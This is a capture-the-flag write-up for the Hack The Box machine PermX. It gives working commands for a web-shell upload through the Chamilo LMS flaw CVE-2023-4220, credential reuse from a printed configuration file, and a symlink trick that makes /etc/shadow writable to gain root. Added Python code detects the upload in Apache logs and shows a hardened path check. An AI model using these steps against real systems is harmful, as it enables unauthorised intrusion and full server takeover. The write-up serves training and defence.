PermX machine on HTB

What can go wrong when a free and open source LMS is vulnerable? Basically everything! This time it was Chamilo, next time…
Information gathering
Enumeration
nmap
Command:
nmap -sC -sV -p- -A 10.10.11.23
Results:
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
|_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-title: eLEARNING
|_http-server-header: Apache/2.4.52 (Ubuntu)
ffuf
Command:
ffuf -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -H 'Host: FUZZ.permx.htb' -u http://permx.htb -fc 302
Results:
lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 71ms]
www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 48ms]
WWW                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 48ms]
Exploitation
Foothold
- The subdomain lms.permx.htb hosts an installation of Chamilo LMS
- This Chamilo version is vulnerable to an unauthenticated file upload, CVE-2023-4220: https://starlabs.sg/advisories/23/23-4220/
- Using curl we can upload a PHP web shell (here rizi85_was_here.php):
    curl -F 'bigUploadFile=@rizi85_was_here.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
- Check the folder where uploads are stored and run the shell:
    http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/
- Once on the server, check /var/www/chamilo/app/config: there is a configuration.php containing the DB credentials
    // Database connection settings.
    $_configuration['db_host'] = 'localhost';
    $_configuration['db_port'] = '3306';
    $_configuration['main_database'] = 'chamilo';
    $_configuration['db_user'] = 'chamilo';
    $_configuration['db_password'] = '03F6lY3uXAP2bkW8';
    // Enable access to database management for platform admins.
    $_configuration['db_manager_enabled'] = false;
- Checking the home folders or the content of /etc/passwd we can see there is a user called “mtz” on the machine; the DB password is reused, so we can SSH in as mtz with it
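From the defender's side, the whole foothold above leaves a very recognisable trace in the Apache access log: a POST to bigUpload.php with action=post-unsupported, followed by a GET of a .php file under the bigupload/files/ directory. The following is an added detection example, not part of the original write-up or of Chamilo; the log lines are constructed, and the rule names, the SCRIPT_EXT list and the correlation logic are my own choices.

```python
"""Detect the CVE-2023-4220 bigUpload abuse pattern in Apache access logs.
Added example (not from the write-up); SAMPLE_LOG is constructed data."""
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format log lines, not real traffic from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jul/2024:10:00:01 +0000] "GET /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 512 "-" "curl/8.0"
10.10.14.5 - - [01/Jul/2024:10:00:02 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 78 "-" "curl/8.0"
10.10.14.5 - - [01/Jul/2024:10:00:05 +0000] "GET /main/inc/lib/javascript/bigupload/files/rizi85_was_here.php HTTP/1.1" 200 1337 "-" "Mozilla/5.0"
192.168.1.20 - - [01/Jul/2024:10:01:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/notes.txt HTTP/1.1" 200 20 "-" "Mozilla/5.0"
192.168.1.21 - - [01/Jul/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 19347 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Paths taken from the write-up's curl command and upload directory.
UPLOAD_ENDPOINT = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
UPLOAD_DIR = "/main/inc/lib/javascript/bigupload/files/"
# Extensions Apache would typically hand to the PHP handler (my assumption).
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")

RULE_UPLOAD = "bigupload_unsupported_post"
RULE_EXEC = "script_served_from_upload_dir"


def parse_line(line):
    """Return a dict for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Name the rule a parsed request matches, or None."""
    if (rec["method"] == "POST" and rec["path"] == UPLOAD_ENDPOINT
            and "post-unsupported" in rec["query"].get("action", [])):
        return RULE_UPLOAD
    if (rec["method"] == "GET" and rec["path"].startswith(UPLOAD_DIR)
            and rec["path"].lower().endswith(SCRIPT_EXT)
            and rec["status"] == 200):
        return RULE_EXEC
    return None


def scan(log_text):
    """Run every line through the rules; return the findings in log order."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rule = classify(rec)
        if rule:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "rule": rule, "path": rec["path"]})
    return findings


def correlate(findings):
    """IPs that both used the upload endpoint and then fetched a script
    from the upload directory: the strongest signal of a dropped web shell."""
    by_ip = {}
    for f in findings:
        by_ip.setdefault(f["ip"], set()).add(f["rule"])
    return sorted(ip for ip, rules in by_ip.items()
                  if {RULE_UPLOAD, RULE_EXEC} <= rules)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for f in hits:
        print(f)
    print("likely web shell drop from:", correlate(hits))
```

Either rule alone is worth an alert on a patched or unpatched install, but the correlation is what separates a scanner probing the endpoint from a successful drop; the obvious mitigation besides patching is to deny PHP execution under the bigupload/files/ directory in the web server configuration.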
Data exfiltration
- Get the content of the user flag: [UserFlag]
Privilege escalation
- Run sudo -l and see that user mtz can run:
    User mtz may run the following commands on permx: (ALL : ALL) NOPASSWD: /opt/acl.sh
- For privesc:
    mtz@permx:~$ ln -s / root
    mtz@permx:~$ sudo /opt/acl.sh mtz rwx /home/mtz/root/etc/shadow
    mtz@permx:~$ nano /etc/shadow
- Now we copy the mtz hash in place of the root hash and log in as root with the same password
- Finally we can su root
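The privesc works because the sudo-allowed script only checks that the requested path starts with /home/mtz/, and a symlink inside the home directory lets that prefix point anywhere. The write-up does not show /opt/acl.sh, so the naive check below is my assumption about the kind of test it performs; the block is an added example, not the machine's script, and builds the whole layout inside a temporary directory so it runs offline without touching the real /etc/shadow.

```python
"""Prefix check vs. realpath-confined check for a sudo helper that grants ACLs.
Added example, not the box's /opt/acl.sh; the scenario is built in a tempdir."""
import os
import shutil
import tempfile


def naive_allowed(home, target):
    """Hypothetical check of the kind the symlink defeats: string prefix only."""
    return target.startswith(home.rstrip("/") + "/")


def hardened_allowed(home, target):
    """Resolve symlinks and '..' first, then require the real target to sit
    under the real home directory."""
    real_home = os.path.realpath(home)
    real_target = os.path.realpath(target)
    return os.path.commonpath([real_home, real_target]) == real_home


def build_scenario():
    """Constructed layout mirroring the write-up, scoped to a temp dir:
    <base>/home/mtz/root -> <base>   (the `ln -s / root` step)
    <base>/etc/shadow                (the file the attacker wants)"""
    base = tempfile.mkdtemp(prefix="permx_")
    home = os.path.join(base, "home", "mtz")
    os.makedirs(home)
    os.makedirs(os.path.join(base, "etc"))
    with open(os.path.join(base, "etc", "shadow"), "w") as fh:
        fh.write("root:*:0:0:::\n")          # dummy content, not a real hash
    os.symlink(base, os.path.join(home, "root"))
    return base, home


def evaluate():
    """Run both checks against the attacker's path and a legitimate one."""
    base, home = build_scenario()
    try:
        escaped = os.path.join(home, "root", "etc", "shadow")  # via the symlink
        inside = os.path.join(home, "notes.txt")               # genuinely in home
        return {
            "naive_escaped": naive_allowed(home, escaped),        # True: bypassed
            "hardened_escaped": hardened_allowed(home, escaped),  # False: blocked
            "hardened_inside": hardened_allowed(home, inside),    # True: still usable
            "resolves_to": os.path.relpath(os.path.realpath(escaped),
                                           os.path.realpath(base)),
        }
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for k, v in evaluate().items():
        print(f"{k}: {v}")
```

The same idea applies to the shell version of such a helper: resolve with realpath -e before comparing, and refuse to follow a path that leaves the user's home once resolved. A second, independent mitigation is to not let the helper change ACLs on anything outside a fixed directory at all.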
Data exfiltration
- Get the root flag: [RootFlag]